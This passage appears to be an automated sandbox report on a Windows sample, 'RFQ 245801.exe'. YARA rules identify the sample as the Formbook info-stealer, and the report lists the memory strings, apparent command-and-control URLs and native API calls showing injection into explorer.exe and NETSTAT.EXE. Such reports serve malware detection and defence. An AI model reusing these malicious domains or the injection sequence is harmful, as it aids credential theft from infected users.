Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyzReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.click/c24t/www.ilw.legal
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.delark.clickReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ealerslot.net/c24t/www.orenzoplaybest14.xyz
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1749071753.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: RFQ 245801.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 00000006.00000002.4161721752.00000000116FF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4145408903.0000000003ADF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud

Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: RFQ 245801.exe
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A330 NtCreateFile, 5_2_0041A330
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A3E0 NtReadFile, 5_2_0041A3E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A460 NtClose, 5_2_0041A460
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A510 NtAllocateVirtualMemory, 5_2_0041A510
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A2EA NtCreateFile, 5_2_0041A2EA
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A32A NtCreateFile, 5_2_0041A32A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A3DA NtReadFile, 5_2_0041A3DA
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A45E NtClose, 5_2_0041A45E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A50A NtAllocateVirtualMemory, 5_2_0041A50A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762B60 NtClose,LdrInitializeThunk, 5_2_01762B60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_01762BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk, 5_2_01762AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_01762D30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_01762D10
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_01762DF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk, 5_2_01762DD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_01762C70
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_01762CA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk, 5_2_01762F30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk, 5_2_01762FE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk, 5_2_01762FB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_01762F90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_01762EA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_01762E80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01764340 NtSetContextThread, 5_2_01764340
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01764650 NtSuspendThread, 5_2_01764650
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BE0 NtQueryValueKey, 5_2_01762BE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BA0 NtEnumerateValueKey, 5_2_01762BA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762B80 NtQueryInformationFile, 5_2_01762B80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AF0 NtWriteFile, 5_2_01762AF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AB0 NtWaitForSingleObject, 5_2_01762AB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D00 NtSetInformationFile, 5_2_01762D00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DB0 NtEnumerateKey, 5_2_01762DB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C60 NtCreateKey, 5_2_01762C60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C00 NtQueryInformationProcess, 5_2_01762C00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CF0 NtOpenProcess, 5_2_01762CF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CC0 NtQueryVirtualMemory, 5_2_01762CC0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F60 NtCreateProcessEx, 5_2_01762F60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FA0 NtQuerySection, 5_2_01762FA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762E30 NtWriteVirtualMemory, 5_2_01762E30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762EE0 NtQueueApcThread, 5_2_01762EE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763010 NtOpenDirectoryObject, 5_2_01763010
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763090 NtSetValueKey, 5_2_01763090
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017635C0 NtCreateMutant, 5_2_017635C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017639B0 NtGetContextThread, 5_2_017639B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763D70 NtOpenThread, 5_2_01763D70
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763D10 NtOpenProcessToken, 5_2_01763D10
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA8232 NtCreateFile, 6_2_0FBA8232
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA9E12 NtProtectVirtualMemory, 6_2_0FBA9E12
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA9E0A NtProtectVirtualMemory, 6_2_0FBA9E0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112B60 NtClose,LdrInitializeThunk, 7_2_03112B60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_03112BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_03112BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AD0 NtReadFile,LdrInitializeThunk, 7_2_03112AD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F30 NtCreateSection,LdrInitializeThunk, 7_2_03112F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FE0 NtCreateFile,LdrInitializeThunk, 7_2_03112FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_03112EA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_03112D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DD0 NtDelayExecution,LdrInitializeThunk, 7_2_03112DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03112DF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_03112C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C60 NtCreateKey,LdrInitializeThunk, 7_2_03112C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_03112CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031135C0 NtCreateMutant,LdrInitializeThunk, 7_2_031135C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03114340 NtSetContextThread, 7_2_03114340
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03114650 NtSuspendThread, 7_2_03114650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112B80 NtQueryInformationFile, 7_2_03112B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BA0 NtEnumerateValueKey, 7_2_03112BA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AB0 NtWaitForSingleObject, 7_2_03112AB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AF0 NtWriteFile, 7_2_03112AF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F60 NtCreateProcessEx, 7_2_03112F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F90 NtProtectVirtualMemory, 7_2_03112F90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FB0 NtResumeThread, 7_2_03112FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FA0 NtQuerySection, 7_2_03112FA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112E30 NtWriteVirtualMemory, 7_2_03112E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112E80 NtReadVirtualMemory, 7_2_03112E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112EE0 NtQueueApcThread, 7_2_03112EE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D00 NtSetInformationFile, 7_2_03112D00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D30 NtUnmapViewOfSection, 7_2_03112D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DB0 NtEnumerateKey, 7_2_03112DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C00 NtQueryInformationProcess, 7_2_03112C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CC0 NtQueryVirtualMemory, 7_2_03112CC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CF0 NtOpenProcess, 7_2_03112CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113010 NtOpenDirectoryObject, 7_2_03113010
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113090 NtSetValueKey, 7_2_03113090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031139B0 NtGetContextThread, 7_2_031139B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113D10 NtOpenProcessToken, 7_2_03113D10
